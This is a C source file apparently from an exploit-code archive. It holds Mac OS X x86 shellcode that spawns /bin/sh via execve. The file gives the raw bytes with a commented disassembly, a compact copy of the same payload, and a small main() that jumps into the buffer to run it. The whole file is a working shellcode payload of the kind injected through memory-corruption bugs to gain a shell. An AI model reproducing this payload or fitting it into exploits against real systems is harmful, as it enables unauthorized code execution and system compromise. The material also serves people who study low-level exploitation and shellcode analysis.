/*
 * osx86 shellcode
 * execve("/bin/sh",{"/bin/sh",NULL},NULL);
 * by nemo@felinemenace.org
 */

char shellcode[] = 
//  .... ! ;********************************************************                                      
//  .... ! ; function _main                                                                             
//  .... ! ;********************************************************                                          
//  .... ! _main:                          ;xref c1ed9                                                         
/*  .... !*/ "\x31\xdb"                       //    xor         ebx, ebx            
/*  1f34 !*/ "\x6a\x3b"                       //    push        3bh        
/*  1f36 !*/ "\x58"                           //    pop         eax                
/*  1f37 !*/ "\x53"                           //    push        ebx
/*  1f38 !*/ "\xeb\x18"                       //    jmp         loc_1f52               
//  1f3a !                                                                                                      
//  .... ! ;-----------------------                                                                             
//  .... ! ;  S U B R O U T I N E                                                                               
//  .... ! ;-----------------------                                                                             
//  .... ! sub_1f3a:                       ;xref c1f52                                                          
/*  .... !*/ "\x5f"                         //    pop         edi                   
/*  1f3b !*/ "\x57"                         //    push        edi                              
/*  1f3c !*/ "\x53"                         //    push        ebx                 
/*  1f3d !*/ "\x54"                         //    push        esp                                 
/*  1f3e !*/ "\x54"                         //    push        esp                  
/*  1f3f !*/ "\x57"                         //    push        edi                          
/*  1f40 !*/ "\x6a\xff"                     //    push        0ffffffffh                    
/*  1f42 !*/ "\x88\x5f\x07"                 //    mov         [edi+7], bl                      
/*  1f45 !*/ "\x89\x5f\xf5"                 //    mov         [edi-0bh], ebx               
/*  1f48 !*/ "\x88\x5f\xfa"                 //    mov         [edi-6], bl  
/*  1f4b !*/ "\x9a\xff\xff\xff\xff\x2b\xff" //    call        2bh:0                          
//  1f52 !                                                                                       
//  .... ! loc_1f52:                       ;xref j1f38                  
/*  .... !*/ "\xe8\xe3\xff\xff\xff"         //    call        sub_1f3a
"/bin/shX";

char osx86_execve[] = 
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";

int main(int ac, char **av)
{
	void (*fp)() = shellcode;
	fp();
}